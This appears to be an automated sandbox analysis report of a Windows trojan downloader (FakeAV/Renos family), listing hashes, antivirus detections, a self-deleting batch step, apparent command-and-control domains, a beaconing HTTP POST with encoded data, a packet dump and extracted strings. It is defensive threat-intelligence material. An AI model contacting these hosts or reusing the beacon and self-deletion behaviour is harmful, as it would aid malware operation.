Analysis Date: 2015-01-27 10:40:28
MD5: 11dc5f6d9a0d761ec43f2cb9f186fb86
SHA1: 859082daffc03f62f64148b64efa994ee88140fd

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .hgcc md5: 86d367568affa2d2bbe08f486c0a99c4 sha1: 5cd1ec44168991bfeb52dc9d74774fa5e0878d59 size: 12800
Section: .imied md5: 87013d84abc3b48307ae5983af71b0c2 sha1: 93b900372afb7cd38f65984e447aaf678a3c05b9 size: 29184
Section: .kellg md5: e722f6d628a76ade88a9f5021f10a442 sha1: 8efdcb681d8cdd419fe132c8a3c4d368fd2aa5dd size: 75264
Section: .kkplh md5: 801acae00f035bc42becc83fae2c62cf sha1: 99b0d66af45a9e0e47b71089b944f47383ff8a32 size: 3072
Section: .ojmd md5: 53e979547d8c2ea86560ac45de08ae25 sha1: 53ea2cb716f312714685c92b6be27e419f8c746c size: 1536
Section: .rsrc md5: 8c579188851f0f1a8459b035a43b0e6b sha1: a5952bd2cc6aa83a31fc84fc57ae785425a81962 size: 1024
Timestamp: 2006-12-30 23:25:46
PEhash: 29e706d8de8db0788a677df589d1918b1d1a5a43
IMPhash: da1b22a8b822889890c9b1386ccca77b
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV Alwil (avast): MalOb-EF [Cryp]
AV Arcabit (arcavir): Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV Authentium: W32/SuspPack.BL.gen!Eldorado
AV Avira (antivir): TR/Kazy.maklt
AV BullGuard: Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV CA (E-Trust Ino): Win32/Wardunlo.BN
AV CAT (quickheal): Win32.Packed.Krap.ag.6
AV ClamAV: Trojan.FakeAV-907
AV Dr. Web: Trojan.Packed.706
AV Emsisoft: Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV Eset (nod32): Win32/Kryptik.BYC
AV Fortinet: W32/Kryptik.AG!tr
AV Frisk (f-prot): W32/SuspPack.BL.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Trojan.Win32.FakeAV
AV K7: Error Scanning File
AV Kaspersky: Trojan.Win32.FraudPack.akht
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-BWS
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.KO
AV MicroWorld (escan): Gen:Trojan.Heur.Renos.hyW@bSzL2@f
AV Rising: no_virus
AV Sophos: Mal/FakeAV-CN
AV Symantec: Trojan.FakeAV!gen20
AV Trend Micro: TROJ_RENOS.SMJ2
AV VirusBlokAda (vba32): BScope.Trojan-Inject.Agent.0564

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat > nul 2> nul
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat > nul 2> nul

Creates File: nul
Deletes File: C:\malware.exe
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Ogf..bat

Network Details:

DNS: castarts.com
Type: A
184.168.221.26
DNS: north-arts-home.com
Type: A
DNS: familygoarts.com
Type: A
HTTP POST: http://castarts.com/img.php?data=v26MmjSySdfyUjV07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQiBMF4cFHrzf4yRtufQpaX/O/tpve7qlQ==
User-Agent: wget 3.0
Flows TCP: 192.168.1.1:1031 ➝ 184.168.221.26:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696d 672e7068 703f6461   POST /img.php?da
0x00000010 (00016)   74613d76 32364d6d 6a537953 64667955   ta=v26MmjSySdfyU
0x00000020 (00032)   6a563037 41555952 724d3759 372f7549   jV07AUYRrM7Y7/uI
0x00000030 (00048)   3945384f 64594953 5830694c 42734f57   9E8OdYISX0iLBsOW
0x00000040 (00064)   51614832 42586179 54337742 55334363   QaH2BXayT3wBU3Cc
0x00000050 (00080)   46586567 63795576 3834554b 5169424d   FXegcyUv84UKQiBM
0x00000060 (00096)   46346346 48727a66 34795274 75665170   F4cFHrzf4yRtufQp
0x00000070 (00112)   61582f4f 2f747076 6537716c 513d3d20   aX/O/tpve7qlQ== 
0x00000080 (00128)   48545450 2f312e31 0d0a436f 6e74656e   HTTP/1.1..Conten
0x00000090 (00144)   742d5479 70653a20 6170706c 69636174   t-Type: applicat
0x000000a0 (00160)   696f6e2f 782d7777 772d666f 726d2d75   ion/x-www-form-u
0x000000b0 (00176)   726c656e 636f6465 640d0a48 6f73743a   rlencoded..Host:
0x000000c0 (00192)   20636173 74617274 732e636f 6d0d0a55    castarts.com..U
0x000000d0 (00208)   7365722d 4167656e 743a2077 67657420   ser-Agent: wget 
0x000000e0 (00224)   332e300d 0a436f6e 74656e74 2d4c656e   3.0..Content-Len
0x000000f0 (00240)   6774683a 20313231 0d0a436f 6e6e6563   gth: 121..Connec
0x00000100 (00256)   74696f6e 3a20636c 6f73650d 0a436163   tion: close..Cac
0x00000110 (00272)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000120 (00288)   61636865 0d0a0d0a 64617461 3d756a6e   ache....data=ujn
0x00000130 (00304)   5433324f 2f463971 73447941 7a36566c   T32O/F9qsDyAz6Vl
0x00000140 (00320)   4d533735 33502f58 34664d4d 78523930   MS753P/X4fMMxR90
0x00000150 (00336)   4e43436f 33645531 43485744 5a303065   NCCo3dU1CHWDZ00e
0x00000160 (00352)   43324879 32625379 47513058 5431702f   C2Hy2bSyGQ0XT1p/
0x00000170 (00368)   572f5a49 614a6b2b 4f644441 7a42324b   W/ZIaJk+OdDAzB2K
0x00000180 (00384)   364c746d 52314c61 432f716e 3949756b   6LtmR1LaC/qn9Iuk
0x00000190 (00400)   362b3732 33775761 2f536b54 7248413d   6+723wWa/SkTrHA=
0x000001a0 (00416)   3d                                    =


Strings
~.
RX.P.)S

!{[{=}
05-&GEFc
2I]Atc
2<^~m|
/<2Q7U
3~A8E`4
3h@tM[
4(DP7xl
4x">t|_9
"![5{0
^5+S1X
>60L$ 
_(6$2p
6&Du	|
|&6gfE
7AN0A37
7|iq+#
85 oTB
8 (PX@
9Qt4b=
Aa4?R8
advapi32.dll
A]fQ	C
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
"BH)ay
B%Pt):
cFq|PS
CopyIcon
CopyImage
 d}8M;
daRpE.e_*
DialogBoxParamA
?%=d!jem
dOxWnh
dZ6|I~
.e2<*V
"+eb+*
EndDialog
EtA>z0<V
ExitProcess
f1RG.~
~Fia=#
fJnY-qj
GeS4\d
GetScrollInfo
GetScrollPos
gskcsn
%G-Y^m
,/h}|0^f
HeapAlloc
hn]H3u
[hP<C{
`.imied
InsertMenuA
?<@IsC
:{K{3#
$!</"kaF
.kellg
kernel32.dll
	~K=F7
.kkplh
kP)-,S
ks[=#;
l@pwuEc8@2
n]+#H+@
N_k$*e
`Nn adl
?.NPqd be
N{S9Fzy`>F
<O@-_I
p0\t8l
P.ojmd
PTM#F/Y
>/QFu)hs
QGbI/k?
RegCreateKeyA
RegCreateKeyExW
RegOpenKeyA
RegOpenKeyW
RegQueryValueW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
}r|#i0
s])b5m6
      </security>
      <security>
sx8*"=,y
t1$c>W3
t@&bfn|xw
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t&|Rwu6i_
T?\uD#L
tuSxqbD
+tZ%`G
U&d]7^
uG.yAt
UKL`o6
user32.dll
,@Uv?	g74
'|V>KL
Vks}Iu
vVth^N
wa.<u$
-Wd:J/
WEY 4e
X*8%VT
~X9pth
xAeNGH
Xe=A!H^!
xKHk*a
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
y8J$"q
 ybS2:
,-Ykk/b
$~yrvndF
Z`3M#A
 zBYPm)
 ZLqX+"